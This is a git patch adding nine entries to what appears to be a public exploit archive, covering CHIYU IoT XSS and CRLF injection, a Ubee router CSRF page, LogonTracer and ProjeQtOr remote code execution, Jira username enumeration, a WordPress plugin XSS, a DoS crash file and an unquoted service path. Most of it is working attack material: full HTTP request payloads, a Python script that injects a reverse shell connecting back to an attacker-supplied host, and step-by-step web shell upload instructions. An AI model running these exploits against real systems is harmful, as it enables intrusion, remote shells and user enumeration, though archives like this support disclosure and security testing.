From 44903d83c72be488f4bd99104260280b66b58439 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 2 Jun 2021 05:02:06 +0000 Subject: [PATCH] DB: 2021-06-02 9 changes to exploits/shellcodes DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Veyon 4.4.1 - 'VeyonService' Unquoted Service Path LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) ProjeQtOr Project Management 9.1.4 - Remote Code Execution Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated) CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) CHIYU TCP/IP Converter devices - CRLF injection Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration) --- exploits/cgi/webapps/49922.txt | 193 +++++++++++++++++++++++++++ exploits/cgi/webapps/49923.txt | 48 +++++++ exploits/hardware/webapps/49920.html | 18 +++ exploits/multiple/webapps/49918.py | 34 +++++ exploits/multiple/webapps/49924.py | 66 +++++++++ exploits/php/webapps/49919.txt | 87 ++++++++++++ exploits/php/webapps/49921.txt | 17 +++ exploits/windows/dos/49917.py | 27 ++++ exploits/windows/local/49925.txt | 41 ++++++ files_exploits.csv | 9 ++ 10 files changed, 540 insertions(+) create mode 100644 exploits/cgi/webapps/49922.txt create mode 100644 exploits/cgi/webapps/49923.txt create mode 100644 exploits/hardware/webapps/49920.html create mode 100755 exploits/multiple/webapps/49918.py create mode 100755 exploits/multiple/webapps/49924.py create mode 100644 exploits/php/webapps/49919.txt create mode 100644 exploits/php/webapps/49921.txt create mode 100755 exploits/windows/dos/49917.py create mode 100644 exploits/windows/local/49925.txt diff --git a/exploits/cgi/webapps/49922.txt b/exploits/cgi/webapps/49922.txt new file mode 100644 index 000000000..7d128846c --- /dev/null +++ b/exploits/cgi/webapps/49922.txt @@ -0,0 +1,193 @@ +# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) +# Date: May 31 2021 +# Exploit Author: sirpedrotavares +# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html +# Software Link: https://www.chiyu-tech.com/category-hardware.html +# Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021 +# Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC +# CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643 +# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks + +Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws. + +#1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices +CVE ID: CVE-2021-31250 +CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N +URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 + +============= PoC 01 =============== +Affected parameter: TF_submask +Component: if.cgi +Payload: "> + +HTTP Request: +GET +/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY +HTTP/1.1 +Host: 192.168.187.12 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.187.12/ap_tcps.htm +Authorization: Basic OmFkbWlu +Connection: close +Upgrade-Insecure-Requests: 1 + + +Steps to reproduce: + 1. Navigate to the vulnerable device + 2. Make a GET request to component mentioned (if.cgi) + 3. Append the payload at the end of the vulnerable parameter (TF_submask) + 4. Submit the request and observe payload execution + + ============= PoC 02 =============== +Affected parameter: TF_hostname=Component: dhcpc.cgi +Payload: /"> +HTTP request and response: + +HTTP Request: +GET +/dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY +HTTP/1.1 +Host: 192.168.187.12 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.187.12/wan_dc.htm +Authorization: Basic OmFkbWlu +Connection: close +Upgrade-Insecure-Requests: 1 + + +Steps to reproduce: + 1. Navigate to the vulnerable device + 2. Make a GET request to component mentioned (dhcpc.cgi) + 3. Append the payload at the end of the vulnerable parameter (TF_hostname) + 4. Submit the request and observe payload execution + + ============= PoC 03 =============== +Affected parameter: TF_servicename=Component: ppp.cgi +Payload: "> + +GET +/ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY +HTTP/1.1 +Host: 192.168.187.143 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.187.143/wan_pe.htm +Authorization: Basic OmFkbWlu +Connection: close +Upgrade-Insecure-Requests: 1 + + +Steps to reproduce: + 1. Navigate to the vulnerable device + 2. Make a GET request to component mentioned (ppp.cgi) + 3. Append the payload at the end of the vulnerable parameter +(TF_servicename) + 4. Submit the request and observe payload execution + +============= PoC 04 =============== +Affected parameter: TF_port=Component: man.cgi +Payload: /"> + +GET +/man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY +HTTP/1.1 +Host: 192.168.187.12 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.187.12/manage.htm +Authorization: Basic OmFkbWlu +Connection: close +Upgrade-Insecure-Requests: 1 + + +Steps to reproduce: + 1. Navigate to the vulnerable device + 2. Make a GET request to component mentioned (man.cgi) + 3. Append the payload at the end of the vulnerable parameter (TF_port) + 4. Submit the request and observe payload execution + + + +#2: Unauthenticated XSS in several CHIYU IoT devices +CVE ID: CVE-2021-31641 +Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N +URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641 + + +Component: any argument passed via URL that results in an HTTP-404 +Payload: http://ip/ + + +Steps to reproduce: + 1. Navigate to the webpage of the vulnerable device + 2. On the web-browsers, you need to append the payload after the IP +address (see payload above) + 3. Submit the request and observe payload execution + + +#3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices +CVE ID: CVE-2021-31643 +Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N +URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643 + +Affected parameter: username= +Component: if.cgi +Payload: "> + +HTTP request - SEMAC Web Ver7.2 + +GET +/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 +HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) +Gecko/20100101 Firefox/87.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 +Accept-Encoding: gzip, deflate +Authorization: Basic YWRtaW46YWRtaW4= +Connection: close +Referer: http://127.0.0.1/EmpRcd.htm +Cookie: fresh=; remote=00000000 +Upgrade-Insecure-Requests: 1 + + +HTTP request - BIOSENSE-III-COMBO(M1)(20000) + +GET +/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 +HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) +Gecko/20100101 Firefox/87.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 +Accept-Encoding: gzip, deflate +Authorization: Basic YWRtaW46YWRtaW4= +Connection: close +Referer: http://127.0.0.1/EmpRcd.htm +Cookie: fresh= +Upgrade-Insecure-Requests: 1 + + +Steps to reproduce: + 1. Navigate to the vulnerable device + 2. Make a GET request to component mentioned (if.cgi) + 3. Append the payload at the end of the vulnerable parameter (username) + 4. Submit the request and observe payload execution \ No newline at end of file diff --git a/exploits/cgi/webapps/49923.txt b/exploits/cgi/webapps/49923.txt new file mode 100644 index 000000000..0746413ce --- /dev/null +++ b/exploits/cgi/webapps/49923.txt @@ -0,0 +1,48 @@ +# Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection +# Date: May 31 2021 +# Exploit Author: sirpedrotavares +# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html +# Software Link: https://www.chiyu-tech.com/category-hardware.html +# Version: BF-430, BF-431, and BF-450M TCP/IP Converter devices - all firmware versions < June 2021 +# Tested on: BF-430, BF-431, and BF-450M +# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks + +Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components. +CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N +URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 + +Affected parameter: redirect=Component: all the CGI components +Payload: %0d%0a%0d%0a + +====HTTP request====== +GET +/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY +HTTP/1.1 +Host: 192.168.187.12 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.187.12/manage.htm +Authorization: Basic OmFkbWlu +Connection: close +Upgrade-Insecure-Requests: 1 + +======HTTP response======== +HTTP/1.1 302 Found +Location: setting.htm + +Content-Length: 0 +Content-Type: text/html + + +Steps to reproduce: + 1. Navigate to the vulnerable device + 2. Make a GET request to all CGI components + 3. Append the payload at the end of the vulnerable parameter (redirect ) + 4. Submit the request and observe payload execution + + + Mitigation: The latest version of the CHIYU firmware should be installed +to mitigate this vulnerability. \ No newline at end of file diff --git a/exploits/hardware/webapps/49920.html b/exploits/hardware/webapps/49920.html new file mode 100644 index 000000000..d3648068e --- /dev/null +++ b/exploits/hardware/webapps/49920.html @@ -0,0 +1,18 @@ +# Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) +# Date: 2021-05-30 +# Exploit Author: lated +# Vendor Homepage: https://www.ubeeinteractive.com +# Version: EVW327 + + + +
+ + + +
+ + + \ No newline at end of file diff --git a/exploits/multiple/webapps/49918.py b/exploits/multiple/webapps/49918.py new file mode 100755 index 000000000..01d325be7 --- /dev/null +++ b/exploits/multiple/webapps/49918.py @@ -0,0 +1,34 @@ +# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) +# Date: 29/05/2021 +# Exploit Author: g0ldm45k +# Vendor Homepage: https://www.jpcert.or.jp/ +# Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0 +# Version: 1.2.0 and earlier +# Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie) +# CVE : CVE-2018-16167 + +import requests +import argparse + +parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.') +parser.add_argument('aip', type=str, help='Attacker ip') +parser.add_argument('aport', type=str, help='Attacker port') +parser.add_argument('victimurl', type=str, help='Victim URL minus the path.') + +args = parser.parse_args() + +ATTACKER_IP = args.aip +ATTACKER_PORT = args.aport +PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'" + +VICTIM_URL = args.victimurl +VICTIM_ENDPOINT = "/upload" + +DATA = { + "logtype": "XML", + "timezone": f"1;{PAYLOAD};", +} + +print("[!] Sending request... If your terminal hangs, you might have a shell!") +requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA) +print("[*] Done. Did you get what you wanted?") \ No newline at end of file diff --git a/exploits/multiple/webapps/49924.py b/exploits/multiple/webapps/49924.py new file mode 100755 index 000000000..1d7130b11 --- /dev/null +++ b/exploits/multiple/webapps/49924.py @@ -0,0 +1,66 @@ +# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration) +# Date: 31/05/2021 +# Exploit Author: Mohammed Aloraimi +# Vendor Homepage: https://www.atlassian.com/ +# Software Link: https://www.atlassian.com/software/jira +# Vulnerable versions: version 8.11.x to 8.15.0 +# Tested on: Kali Linux +# Proof Of Concept: + +''' +A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x. Unauthenticated users can ENUMRATE valid users via /secure/QueryComponent!Jql.jspa endpoint. + +Tested versions: + +Atlassian JIRA 8.11.1 +Atlassian JIRA 8.13 +Atlassian JIRA 8.15 +''' + +#!/usr/bin/env python + +__author__ = "Mohammed Aloraimi (@ixSly)" + + + +import requests +import sys +import re +import urllib3 +urllib3.disable_warnings() + + +def help(): + print('python script.py ') + print('e.g. python script.py https://jiratarget.com admin') + sys.exit() + +if len(sys.argv) < 3: + help() + + + +def pwn(url,username): + + try: + headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"} + data="jql=creator+in+({})&decorator=none".format(username) + req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data) + if "issue.field.project" in req.text and req.status_code == 200: + print("[+] {} is a Valid User".format(username)) + userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip()) + if userFullName: + print("[+] User FullName: " + userFullName.group(1)) + elif '["jqlTooComplex"]' in req.text and req.status_code == 401: + print("[-] {} is not a Valid User".format(username)) + else: + print("[-] Error..") + except Exception as e: + print(str(e)) + pass + +server = sys.argv[1] +username = sys.argv[2] + + +pwn(server,username) \ No newline at end of file diff --git a/exploits/php/webapps/49919.txt b/exploits/php/webapps/49919.txt new file mode 100644 index 000000000..b012963aa --- /dev/null +++ b/exploits/php/webapps/49919.txt @@ -0,0 +1,87 @@ +# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution +# Date: 29.05.2021 +# Exploit Author: Temel Demir +# Vendor Homepage: https://www.projeqtor.org +# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip +# Version: v9.1.4 +# Tested on: Laragon @WIN10 +# Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section. + +PoC Process Step_by_Step: + +# 1) Create a file with the below php code and save it as demir.pHp + +&1'); ?> + +# 2) Login to ProjeQtOr portal as guest user +# 3) Click -profile- button on header panel. +# 4) Click -add photo- button and chose upload section and browse your demir.pHp file. +# 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" ) +# 6) As a last step you have to add the ".projeqtor" statement to the file extension. +You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor + +# 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command] + + + +Example Request: + +POST /project/tool/saveAttachment.php HTTP/1.1 +Host: ip:port +Content-Length: 1196 +Accept: application/json +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Origin: http://ip:port/website_location/ +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://ip:port/website_location/view/main.php +Accept-Encoding: gzip, deflate +Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 +Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit) +Connection: close + +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp" +Content-Type: application/octet-stream + +&1'); ?> +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Content-Disposition: form-data; name="attachmentId" + + +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Content-Disposition: form-data; name="attachmentRefType" + +User +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Content-Disposition: form-data; name="attachmentRefId" + +($your_profile_id //edit) +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Content-Disposition: form-data; name="attachmentType" + +file +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +10485760 +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Content-Disposition: form-data; name="attachmentLink" + + +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Content-Disposition: form-data; name="attachmentDescription" + + +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Content-Disposition: form-data; name="attachmentPrivacy" + +1 +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ +Content-Disposition: form-data; name="uploadType" + +html5 +------WebKitFormBoundaryEPEodMA4Ojb7pSuQ-- \ No newline at end of file diff --git a/exploits/php/webapps/49921.txt b/exploits/php/webapps/49921.txt new file mode 100644 index 000000000..370551da7 --- /dev/null +++ b/exploits/php/webapps/49921.txt @@ -0,0 +1,17 @@ +# Exploit Title: WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated) +# Date: 2021-05-31 +# Exploit Author: Bastijn Ouwendijk +# Vendor Homepage: http://goprayer.com/ +# Software Link: https://wordpress.org/plugins/wp-prayer/ +# Version: 1.6.1 and earlier +# Tested on: Windows 10 +# Proof: https://bastijnouwendijk.com/cve-2021-24313/ + +Steps to exploit this vulnerability: + +1. Log into the WordPress website with a user account, can be a user with any role +2. Go to the page where prayer or praise request can be made and fill in the requested information +3. In the 'prayer_messages' field of the prayer request form put the payload: +4. Submit the form +5. Go to the page where the prayer requests are listed +6. The prayer requests are loaded and an alert is shown with text 'XSS' in the browser \ No newline at end of file diff --git a/exploits/windows/dos/49917.py b/exploits/windows/dos/49917.py new file mode 100755 index 000000000..d7111f8b8 --- /dev/null +++ b/exploits/windows/dos/49917.py @@ -0,0 +1,27 @@ +# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC) +# Date: 2021-05-28 +# Author: Brian Rodríguez +# Software Site: https://sourceforge.net/projects/dupterminator/ +# Version: 1.4.5639.37199 +# Category: DoS (Windows) + +##### Vulnerability ##### + +DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box. + +Successful exploitation will causes application stop working. + +I have been able to test this exploit against Windows 10. + +##### PoC ##### + +#!/usr/bin/env python +buffer = "\x41" * 8000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/windows/local/49925.txt b/exploits/windows/local/49925.txt new file mode 100644 index 000000000..2b5a90bff --- /dev/null +++ b/exploits/windows/local/49925.txt @@ -0,0 +1,41 @@ +# Exploit Title: Veyon 4.4.1 - 'VeyonService' Unquoted Service Path +# Discovery by: Víctor García +# Discovery Date: 2020-03-23 +# Vendor Homepage: https://veyon.io/ +# Software Link: https://github.com/veyon/veyon/releases/download/v4.4.1/veyon-4.4.1.0-win64-setup.exe +# Tested Version: 4.4.1 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Pro x64 +# CVE: CVE-2020-15261 + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i +"auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ +Veyon Service VeyonService C:\Program Files\Veyon\veyon-service.exe + + +# Service info: + +C:\>sc qc VeyonService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: VeyonService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Veyon\veyon-service.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Veyon Service + DEPENDENCIES : Tcpip + : RpcSs + SERVICE_START_NAME : LocalSystem + + +# Exploit: + +# A successful attempt would require the local user to be able to insert their code in the +# system root path undetected by the OS or other security applications where it could +# potentially be executed during application startup or reboot. If successful, the local +# user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6e88233c8..cc2566b0d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6784,6 +6784,7 @@ id,file,description,date,author,type,platform,port 49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",2021-05-19,"Luis Martínez",dos,ios, 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows, 49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows, +49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",2021-06-01,"Brian Rodriguez",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11339,6 +11340,7 @@ id,file,description,date,author,type,platform,port 49893,exploits/windows/local/49893.c++,"DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)",2021-05-21,"Paolo Stagno",local,windows, 49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",2021-05-24,"Erick Galindo",local,windows, 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",2021-05-24,"Emmanuel Lujan",local,windows, +49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44079,3 +44081,10 @@ id,file,description,date,author,type,platform,port 49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",2021-05-28,"Ron Jost",webapps,php, 49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",2021-05-28,"Ron Jost",webapps,php, 49915,exploits/linux/webapps/49915.rb,"Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)",2021-05-28,"Jon Stratton",webapps,linux, +49918,exploits/multiple/webapps/49918.py,"LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)",2021-06-01,g0ldm45k,webapps,multiple, +49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php, +49920,exploits/hardware/webapps/49920.html,"Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)",2021-06-01,lated,webapps,hardware, +49921,exploits/php/webapps/49921.txt,"WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated)",2021-06-01,"Bastijn Ouwendijk",webapps,php, +49922,exploits/cgi/webapps/49922.txt,"CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)",2021-06-01,sirpedrotavares,webapps,cgi, +49923,exploits/cgi/webapps/49923.txt,"CHIYU TCP/IP Converter devices - CRLF injection",2021-06-01,sirpedrotavares,webapps,cgi, +49924,exploits/multiple/webapps/49924.py,"Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)",2021-06-01,"Mohammed Aloraimi",webapps,multiple,